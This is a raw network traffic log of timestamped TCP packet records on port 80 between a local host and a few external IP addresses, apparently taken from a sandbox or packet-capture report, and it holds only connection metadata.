Jul 27, 2023 20:18:44.284384012 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284404993 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284426928 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284427881 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284446955 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284467936 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284482956 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284504890 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284528017 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284584999 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284605980 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284638882 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284641981 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284689903 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284707069 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284728050 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284749985 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284770966 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284782887 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284818888 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284833908 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284876108 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284895897 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284917116 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284921885 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284939051 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284959078 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284962893 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284979105 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285001040 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285002947 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285021067 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285039902 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285046101 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285059929 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285079002 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285083055 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285100937 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285118103 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285120964 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285140991 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285161018 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285165071 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285180092 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285198927 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285202026 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285222054 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285242081 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285249949 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285263062 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285283089 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285285950 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285304070 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285324097 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285326004 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285343885 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285365105 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285371065 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285384893 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285406113 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285413027 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285427094 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285446882 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285456896 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285466909 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285486937 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285507917 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285509109 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285521984 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285541058 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285554886 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285562992 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285584927 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285604000 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285607100 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285626888 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285628080 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285667896 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285670042 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285689116 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285710096 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285722971 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285731077 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285753012 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.285763025 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.285808086 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.286326885 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.561474085 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.998990059 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:45.015959024 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:45.016148090 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:45.106787920 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.123034000 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.123325109 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.139101028 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.139169931 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.155411005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.155441999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.262622118 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.262658119 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.263911963 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.288827896 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.288875103 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.305126905 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.305155039 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387643099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387700081 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387722969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387746096 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387769938 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387793064 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387814045 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387830019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387835979 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.387851954 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387866020 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.387875080 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.387888908 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.387913942 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.388477087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.388501883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.388555050 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.416503906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416539907 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416559935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416584015 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416604996 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416817904 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416836977 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416857958 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.416893005 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.416966915 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.416990995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417012930 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417037964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417045116 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.417058945 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.417635918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417671919 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417694092 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417715073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417737007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.417740107 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.417776108 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.417776108 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.418601990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.418622971 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.418642044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.418663025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.418684959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.418709040 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.418736935 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.419580936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.419605017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.419625044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.419661999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.419666052 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.419697046 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.448926926 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.448988914 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449032068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449070930 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.449074030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449114084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449150085 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.449296951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449342966 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.449342966 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449389935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449412107 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.449433088 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449470997 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.449477911 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.450092077 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.450140953 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.450186014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.450227976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.450257063 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.450267076 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.450328112 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.450937986 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.450984001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.451026917 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.451070070 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.451112032 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.451127052 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.451886892 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.451934099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.451978922 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.452018976 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.452020884 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.452052116 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.452064037 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.452122927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.452910900 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.452956915 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453001022 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453042984 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453063011 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.453087091 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453099012 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.453804970 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453850985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453893900 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453928947 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.453938007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.453949928 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.453983068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.454787970 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.454840899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.454889059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.454931021 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.454936981 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.454984903 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.455002069 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.455768108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.455818892 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.455866098 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.455913067 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.455945969 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.455960035 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.456011057 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.456698895 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.456743956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.456825972 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.481369019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481426001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481476068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481528044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481570005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481581926 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.481618881 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481622934 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.481662035 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.481813908 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481868029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481915951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.481930017 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.481960058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.482012987 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.482393026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.482443094 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.482491016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.482510090 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.482537985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.482584000 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.482588053 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.483335972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.483385086 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.483405113 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.483433008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.483481884 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.483941078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.483989000 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484035969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484086037 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484132051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484172106 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.484853029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484899044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484944105 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484993935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.484996080 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.485039949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.485069036 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.485856056 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.485903978 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.485934019 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.485949993 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.485981941 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.485994101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.486038923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.486038923 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.486778975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.486843109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.486891031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.486917973 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.486937046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.486947060 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.486984015 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.487159967 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.487756014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.487811089 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.487859011 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.487906933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.487915039 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.487953901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.488010883 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.488879919 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.488929033 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.488975048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489018917 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489041090 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.489064932 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489111900 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.489717007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489768982 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489819050 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489866972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489903927 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.489929914 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.497932911 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498176098 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498229027 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498245955 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.498275995 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.498280048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498327971 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498377085 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498382092 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.498826027 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498874903 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498923063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.498941898 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.498970985 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.498972893 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.499022961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.499207973 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.499815941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.499865055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.499913931 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.499960899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.500009060 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.500011921 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.501153946 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.501204014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.501250029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.501297951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.501308918 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.501332045 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.501344919 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.502101898 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.502152920 CEST	80	49683	188.114.96.7	192.168.2.4
